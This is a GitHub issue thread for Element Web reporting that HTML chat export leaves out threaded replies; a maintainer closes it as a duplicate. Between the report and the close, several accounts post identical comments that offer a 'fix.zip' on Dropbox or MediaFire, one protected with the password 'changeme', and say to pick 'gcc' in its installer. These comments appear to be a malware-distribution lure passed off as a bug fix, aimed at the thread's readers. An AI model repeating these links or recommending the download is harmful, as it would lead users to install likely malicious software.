### ISSUE TITLE
Chat export does not include threads

### ISSUE THREAD

**Issue by turt2live** [element-hq/element-web#27964] opened 2024-08-26 02:57 UTC
### Steps to reproduce

1. Create a new room
2. Send a message
3. Send a reply in a thread
4. Export chat as HTML

#### What did you expect?

Threads to be included, either as replies or as an interactable element.

#### What happened instead?

![image](https://github.com/user-attachments/assets/f077ab6d-6e5d-481d-8c8f-6aa99b7bedff)

(message redacted for privacy)

### Operating system

Windows 11

### Application version

Element Nightly version: 0.0.1-nightly.2024082301 Crypto version: Rust SDK 0.7.1 (c8c9d15), Vodozemac 0.6.0

### How did you install the app?

The Internet

### Homeserver

t2l.io

### Will you send logs?

No

**Comment by pilot5657** [comment] 2024-08-26 03:29
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment] 2024-08-26 03:30
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment] 2024-08-26 03:43
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment] 2024-08-26 04:03
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment] 2024-08-26 06:41
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by t3chguy** [comment] 2024-08-28 09:57
Duplicate of https://github.com/element-hq/element-web/issues/27259

**Closed by t3chguy** 2024-08-28 09:57 UTC
Labels: T-Defect, S-Minor, O-Occasional, A-Threads, A-Export-Chat
